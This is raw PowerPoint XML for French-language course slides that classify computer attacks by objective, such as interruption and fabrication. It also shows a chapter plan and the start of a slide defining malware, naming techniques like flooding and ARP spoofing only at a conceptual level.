              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Attaquant </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Straight Connector 22"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="13" idx="6"/>
              <a:endCxn id="14" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9911783" y="3228887"/>
              <a:ext cx="1296144" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="00206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Curved Connector 26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10144644" y="3228887"/>
              <a:ext cx="689128" cy="772773"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector2">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31022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a:t>Classification des attaques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289558" y="805752"/>
            <a:ext cx="8916260" cy="5769219"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Selon l’objectif visé</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Interruption </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cette attaque vise la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>disponibilité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> des ressources où les utilisateurs légitimes ne peuvent plus y accéder. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Elle bloque les messages transmis entre les communicants ou détruit une ressource pour la rendre indisponible ou inutilisable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Exemples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Destruction d’un disque dur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Coupure d’une ligne de communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Mettre hors service un système de gestion de fichiers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Techniques </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Flooding</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Smurf </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Débordement de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>tampon (Buffer overflow)</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28</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Groupe 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9551743" y="700780"/>
            <a:ext cx="2525332" cy="951253"/>
            <a:chOff x="6569057" y="1329197"/>
            <a:chExt cx="2525332" cy="951253"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Oval 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6732240" y="1700808"/>
              <a:ext cx="360040" cy="333817"/>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val 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8388424" y="1700808"/>
              <a:ext cx="360040" cy="333818"/>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Straight Connector 10"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="6" idx="6"/>
              <a:endCxn id="7" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7092280" y="1867717"/>
              <a:ext cx="1296144" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="00206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11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6569057" y="2003451"/>
              <a:ext cx="686406" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Source </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="TextBox 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8042498" y="2001300"/>
              <a:ext cx="1051891" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Destination </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 15"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7171073" y="1329197"/>
              <a:ext cx="1194558" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" b="1" u="sng" dirty="0" smtClean="0"/>
                <a:t>Flux normal</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Groupe 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9551743" y="2722022"/>
            <a:ext cx="2525332" cy="871779"/>
            <a:chOff x="6569057" y="3187529"/>
            <a:chExt cx="2525332" cy="871779"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Oval 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6746355" y="3497430"/>
              <a:ext cx="360040" cy="333817"/>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14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8402539" y="3497430"/>
              <a:ext cx="360040" cy="333818"/>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17"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6569057" y="3189680"/>
              <a:ext cx="686406" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Source </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="TextBox 18"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8042498" y="3187529"/>
              <a:ext cx="1051891" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Destination </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29" name="Straight Connector 19"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7106395" y="3717032"/>
              <a:ext cx="684000" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="00206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Connector 20"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7790395" y="3374756"/>
              <a:ext cx="0" cy="68455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420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a:t>Classification des attaques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289558" y="805752"/>
            <a:ext cx="8916260" cy="5769219"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Selon l’objectif visé</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fabrication </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cette attaque vise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’authenticité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> des entités et des informations </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’attaquant insère de nouvelles informations créées de façon non autorisée dans le système</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Exemples</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Insertion de faux messages dans un réseau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’ajout d’informations dans un fichier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Techniques </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>spoofing</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>spoofing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </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29</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Groupe 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9551743" y="700780"/>
            <a:ext cx="2525332" cy="951253"/>
            <a:chOff x="6569057" y="1329197"/>
            <a:chExt cx="2525332" cy="951253"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Oval 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6732240" y="1700808"/>
              <a:ext cx="360040" cy="333817"/>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val 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8388424" y="1700808"/>
              <a:ext cx="360040" cy="333818"/>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Straight Connector 10"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="6" idx="6"/>
              <a:endCxn id="7" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7092280" y="1867717"/>
              <a:ext cx="1296144" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="00206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11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6569057" y="2003451"/>
              <a:ext cx="686406" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Source </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="TextBox 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8042498" y="2001300"/>
              <a:ext cx="1051891" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Destination </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 15"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7171073" y="1329197"/>
              <a:ext cx="1194558" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" b="1" u="sng" dirty="0" smtClean="0"/>
                <a:t>Flux normal</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Groupe 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9448954" y="3068187"/>
            <a:ext cx="2525332" cy="1867706"/>
            <a:chOff x="6569057" y="3187529"/>
            <a:chExt cx="2525332" cy="1867706"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Oval 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6746355" y="3497430"/>
              <a:ext cx="360040" cy="333817"/>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14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8402539" y="3497430"/>
              <a:ext cx="360040" cy="333818"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>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16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7682458" y="4432921"/>
              <a:ext cx="360040" cy="333817"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln>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Elbow Connector 17"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="33" idx="6"/>
              <a:endCxn id="32" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8042498" y="3664339"/>
              <a:ext cx="360041" cy="935491"/>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18"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6569057" y="3189680"/>
              <a:ext cx="686406" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Source </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="TextBox 19"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8042498" y="3187529"/>
              <a:ext cx="1051891" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Destination </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="TextBox 20"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7411072" y="4778236"/>
              <a:ext cx="902811" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Attaquant </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21680762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97175"/>
            <a:ext cx="10515600" cy="773210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Plan du chapitre 3</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1378973"/>
            <a:ext cx="10515600" cy="5131836"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les attaques informatiques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Classification des attaques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les malwares</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les types d’attaques : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les attaques réseaux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les attaques web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les attaques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>applicatives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Ingénierie sociale</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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3</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10422348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59" y="0"/>
            <a:ext cx="11684727" cy="805753"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les malwares</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289557" y="805752"/>
            <a:ext cx="11804471" cy="5769219"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Abréviation de : « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>Mal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>icious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Soft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>ware » </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>logiciel malveillant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>On dit qu’un programme est un malware si : </a:t>
